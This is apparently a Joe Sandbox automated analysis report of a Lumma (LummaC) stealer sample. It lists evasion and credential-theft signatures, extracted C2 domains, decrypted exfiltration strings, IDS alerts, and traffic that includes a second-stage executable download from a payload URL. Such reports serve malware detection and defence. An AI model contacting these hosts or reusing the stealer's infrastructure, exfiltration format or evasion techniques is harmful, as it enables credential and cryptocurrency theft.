Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1559711
MD5:1f9e0235a6c12bd12d8220185fad9d04
SHA1:9673c5a73b0a5823adabd6e5e831415e49cc2139
SHA256:c0ab2ce327eb8e97036ac5bd876658cb5b7016dab1d8dd1aced2786f66941d40
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6860 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1F9E0235A6C12BD12D8220185FAD9D04)
    • chrome.exe (PID: 5756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 2916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2008,i,3826648894822423509,4444800806446167080,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7740 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,2029121025495776,18205823423671010898,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["3xp3cts1aim.sbs", "p3ar11fter.sbs", "p10tgrace.sbs", "peepburry828.sbs", "processhol.sbs"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1837908059.0000000000DC1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.1763547491.0000000000DC4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1789605259.0000000000DC4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1763473029.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1814476131.0000000000DD5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 6 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T21:04:03.986111+010020283713Unknown Traffic192.168.2.449730104.21.66.38443TCP
              2024-11-20T21:04:05.998932+010020283713Unknown Traffic192.168.2.449731104.21.66.38443TCP
              2024-11-20T21:04:08.362682+010020283713Unknown Traffic192.168.2.449732104.21.66.38443TCP
              2024-11-20T21:04:10.836396+010020283713Unknown Traffic192.168.2.449733104.21.66.38443TCP
              2024-11-20T21:04:13.498944+010020283713Unknown Traffic192.168.2.449734104.21.66.38443TCP
              2024-11-20T21:04:16.181341+010020283713Unknown Traffic192.168.2.449735104.21.66.38443TCP
              2024-11-20T21:04:18.903549+010020283713Unknown Traffic192.168.2.449737104.21.66.38443TCP
              2024-11-20T21:04:25.387127+010020283713Unknown Traffic192.168.2.449742104.21.66.38443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T21:04:04.692509+010020546531A Network Trojan was detected192.168.2.449730104.21.66.38443TCP
              2024-11-20T21:04:06.708558+010020546531A Network Trojan was detected192.168.2.449731104.21.66.38443TCP
              2024-11-20T21:04:26.139635+010020546531A Network Trojan was detected192.168.2.449742104.21.66.38443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T21:04:04.692509+010020498361A Network Trojan was detected192.168.2.449730104.21.66.38443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T21:04:06.708558+010020498121A Network Trojan was detected192.168.2.449731104.21.66.38443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T21:04:27.674813+010020197142Potentially Bad Traffic192.168.2.449744185.215.113.1680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T21:04:16.971858+010020480941Malware Command and Control Activity Detected192.168.2.449735104.21.66.38443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: https://cook-rain.sbs/oAvira URL Cloud: Label: malware
              Source: http://185.215.113.16/off/def.exeqXAvira URL Cloud: Label: phishing
              Source: http://185.215.113.16/jrAvira URL Cloud: Label: phishing
              Source: https://cook-rain.sbs/apiuAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/apivalueAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/.Avira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/apirviceAvira URL Cloud: Label: malware
              Source: http://185.215.113.16/off/def.exemXAvira URL Cloud: Label: phishing
              Source: https://cook-rain.sbs/9Avira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/CAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/apidAvira URL Cloud: Label: malware
              Source: http://185.215.113.16/ErAvira URL Cloud: Label: phishing
              Source: https://cook-rain.sbs/tPAvira URL Cloud: Label: malware
              Source: https://cook-rain.sbs/%Avira URL Cloud: Label: malware
              Source: file.exe.6860.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["3xp3cts1aim.sbs", "p3ar11fter.sbs", "p10tgrace.sbs", "peepburry828.sbs", "processhol.sbs"], "Build id": "LOGS11--LiveTraffic"}
              Source: file.exeJoe Sandbox ML: detected
              Source: 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: p3ar11fter.sbs
              Source: 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: 3xp3cts1aim.sbs
              Source: 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: peepburry828.sbs
              Source: 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: p10tgrace.sbs
              Source: 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: processhol.sbs
              Source: 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000003.1711721971.00000000049B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.4:49759 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.4:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49796 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49805 version: TLS 1.2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 104.21.66.38:443
              Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
              Source: Malware configuration extractorURLs: p3ar11fter.sbs
              Source: Malware configuration extractorURLs: p10tgrace.sbs
              Source: Malware configuration extractorURLs: peepburry828.sbs
              Source: Malware configuration extractorURLs: processhol.sbs
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:04:27 GMTContent-Type: application/octet-streamContent-Length: 2768384Last-Modified: Wed, 20 Nov 2024 19:41:03 GMTConnection: keep-aliveETag: "673e3b4f-2a3e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 6b 14 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 79 73 64 6e 6e 65 6d 00 e0 29 00 00 a0 00 00 00 dc 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 76 63 6e 73 67 63 6d 00 20 00 00 00 80 2a 00 00 06 00 00 00 16 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 1c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
              Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.66.38:443
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49744 -> 185.215.113.16:80
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.66.38:443
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gzyZfBdA9bgtO6B&MD=sVMyygHk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gzyZfBdA9bgtO6B&MD=sVMyygHk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
